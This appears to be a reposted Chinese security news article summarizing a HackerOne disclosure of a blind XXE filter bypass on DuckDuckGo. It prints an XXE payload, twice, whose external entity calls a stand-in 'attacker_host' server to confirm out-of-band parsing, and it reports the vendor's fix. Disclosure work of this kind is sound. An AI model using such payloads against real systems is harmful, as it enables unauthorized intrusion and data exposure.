duckduckgo为什么被墙(DuckDuckGo上BlindXXE漏洞防护绕过)
duckduckgo为什么被墙(DuckDuckGo上BlindXXE漏洞防护绕过)来源:https://nosec.org/home/detail/2284.html本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场复现步骤<?xm l version="1.0" ?> <!DOCTYPE root [ <!ENTITY % ext SYSTEM "http://attacker_host/Blind_xxe"> %ext; ]> <r></r> 攻击者在浏览器上访问 ,其中 代表上一步的XXE攻击文件:最后,攻击者可在自己的服务器上检测到 被访问,这说明攻击者的xm l文件成功被DuckDuckGo解析。最后,发现者还表示,不仅duckduckgo.com存在这个问题,api.duckduckgo.com网站也存在这个问题。随后,DuckDuckGo安全团队表示漏洞已再次修复,请帮忙检查。发现者在复查后,表示
近期,白帽汇安全研究院发现HackerOne网站公开了一个DuckDuckGo网站的XXE漏洞。该漏洞是以前一个DuckDuckGo网站XXE漏洞的新绕过方法,两个漏洞的发现者为同一个人。(上个XXE漏洞说明:https://nosec.org/home/detail/2219.html)
DuckDuckGo强调在传统搜寻引擎的基础上引入各大Web 2.0站点的内容。其办站哲学主张维护使用者的隐私权,并承诺不监控、不记录使用者的搜寻内容。
——来自百度百科
以下为漏洞具体说明:
复现步骤
- 首先攻击者在自己的外网服务器上搭建web服务,并且放上一个文件内容如下的XXE攻击文件(xm l文件):
<?xm l version="1.0" ?> <!DOCTYPE root [ <!ENTITY % ext SYSTEM "http://attacker_host/Blind_xxe"> %ext; ]> <r></r>
- 攻击者在浏览器上访问 ,其中 代表上一步的XXE攻击文件:
- 最后,攻击者可在自己的服务器上检测到 被访问,这说明攻击者的xm l文件成功被DuckDuckGo解析。
最后,发现者还表示,不仅duckduckgo.com存在这个问题,api.duckduckgo.com网站也存在这个问题。
随后,DuckDuckGo安全团队表示漏洞已再次修复,请帮忙检查。发现者在复查后,表示虽不知道后端防护逻辑,但漏洞已成功修复。不过,发现者同时表示,XXE漏洞的防护不能只检查文件引用源头,还要检查文件的内容。
本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://nosec.org/home/detail/2284.html
原文:https://hackerone.com/reports/486732
白帽汇从事信息安全,专注于安全大数据、企业威胁情报。
公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。
为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。